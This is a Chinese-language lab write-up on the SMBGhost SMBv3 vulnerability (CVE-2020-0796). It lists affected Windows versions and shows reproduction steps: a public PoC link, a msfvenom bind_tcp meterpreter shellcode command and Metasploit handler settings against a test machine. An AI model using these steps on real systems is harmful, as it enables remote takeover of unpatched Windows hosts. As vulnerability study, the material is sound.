目录
CVE-2020-0796
漏洞描述
漏洞危害等级
影响版本
漏洞复现
实现本地提权
CVE-2020-0796
漏洞描述
2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。
漏洞危害等级
高
影响版本
- Windows 10 Version 1903 for 32-bit Systems
- Windows 10 Version 1903 for x64-based Systems
- Windows 10 Version 1903 for ARM64-based Systems
- Windows Server, Version 1903 (Server Core installation)
- Windows 10 Version 1909 for 32-bit Systems
- Windows 10 Version 1909 for x64-based Systems
- Windows 10 Version 1909 for ARM64-based Systems
- Windows Server, Version 1909 (Server Core installation)
漏洞复现
- 靶机:192.168.10.26(Win10 1903版本)
- Kali攻击机:192.168.10.13
POC地址:https://github.com/chompie1337/SMBGhost_RCE_PoC
先检测目标是否存在该漏洞
使用 msfvenom 生成 python 类型正向连接的 shellcode
代码语言:javascript复制msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b 'x00' -i 1 -f python
将生成的 shellcode 替换 POC 中 exploit.py 里的USER_PAYLOAD字段,注意要将buf替换为USER_PAYLOAD
MSF启动监听
代码语言:javascript复制use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8888
set rhost 192.168.10.26
run
POC发起攻击,攻击成功
注意:在用POC打的过程中,极易出现蓝屏或重启的风险,使用时应注意!
实现本地提权
来源:谢公子的博客
责编:Zuo